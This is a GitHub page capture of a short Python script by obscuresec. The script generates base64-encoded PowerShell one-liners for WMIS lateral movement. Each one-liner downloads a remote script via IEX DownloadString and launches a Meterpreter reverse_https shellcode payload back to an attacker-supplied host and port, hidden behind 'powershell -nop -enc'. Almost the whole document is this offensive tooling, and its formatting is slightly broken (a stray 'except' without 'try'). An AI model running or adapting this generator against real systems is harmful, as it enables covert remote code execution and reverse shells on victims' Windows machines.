Skip to content
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
57 lines (45 sloc) 1.52 KB
#!/usr/bin/env python
# Simple python script to output meterpreter commands for WMIS
# by Chris Campbell (obscuresec)
import base64
import sys
def build(url,lhost,lport):
#build script syntax
script = "IEX (New-Object Net.WebClient).DownloadString('{0}'); Invoke-Shellcode ".format(url)
script += "-Payload windows/meterpreter/reverse_https -Lhost {0} -Lport {1} -Force".format(lhost,lport)
print "The powershell syntax to be run:"
print ""
print script
print ""
#convert string to LE Unicode
unicode = script.encode('utf_16_le')
#base64 encode the script portion
encoded = base64.b64encode(unicode)
#build the final command
cmd = "cmd.exe /c powershell.exe -nop -nol -enc {0}".format(encoded)
#check length in case long url is provided
cmdlen = len(cmd)
if cmdlen > 8191:
print "The length of the command is to long to use! Limit is 8191"
print "Try using a URL shortener."
return cmd
#grab args
lhost = sys.argv[1]
lport = sys.argv[2]
url = sys.argv[3]
if url == 'default':
url = ''
ps = build(url,lhost,lport)
print "The command is:"
print ""
print ps
#index error
except IndexError:
print "python lhost lport url"
print "ex: python '' '443' 'default'"
print "ex: python '' '443' ''"
You can’t perform that action at this time.